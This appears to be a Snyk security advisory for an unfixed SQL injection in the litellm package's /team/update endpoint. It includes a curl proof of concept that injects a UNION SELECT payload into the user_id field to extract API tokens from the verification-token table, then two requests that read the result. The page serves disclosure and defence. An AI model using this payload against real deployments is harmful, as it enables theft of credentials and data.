SQL Injection Affecting litellm package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (9th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-LITELLM-7218854
- published 7 Jun 2024
- disclosed 6 Jun 2024
- credit mvlttt
Introduced: 6 Jun 2024
New CVE-2024-4890 Open this link in a new tabHow to fix?
There is no fixed version for litellm
.
Overview
litellm is a Library to easily interface with LLM API providers
Affected versions of this package are vulnerable to SQL Injection through the /team/update
process. An attacker can extract or manipulate sensitive data by injecting malicious SQL commands into the user_id
parameter.
PoC
curl http://localhost:8000/team/update -X POST -H "Authorization: Bearer sk-app_user_token" -H "Content-Type: application/json" -d "{\"team_id\":\"45e3e396-ee08-4a61-a88e-16b3ce7e0849\",\"members_with_roles\":[{\"role\":\"user\",\"user_id\":\"test\"},{\"role\":\"user\",\"user_id\":\"') UNION SELECT 'test', '',ARRAY[token], '', NULL, 0, '', '{}', NULL, NULL, NULL, '', NULL, '{}', '{}', '{}' from \\\"LiteLLM_VerificationToken\\\" where user_id='default_user_id' limit 1-- -\"}]}"
curl http://localhost:8000/team/update -X POST -H "Authorization: Bearer sk-app_user_token" -H "Content-Type: application/json" -d "{\"team_id\":\"45e3e396-ee08-4a61-a88e-16b3ce7e0849\",\"members_with_roles\":[{\"role\":\"user\",\"user_id\":\"test\"}]}"
curl "http://localhost:8000/user/info?user_id=test" -H "Authorization: Bearer sk-app_user_token"
References
CVSS Scores
version 3.1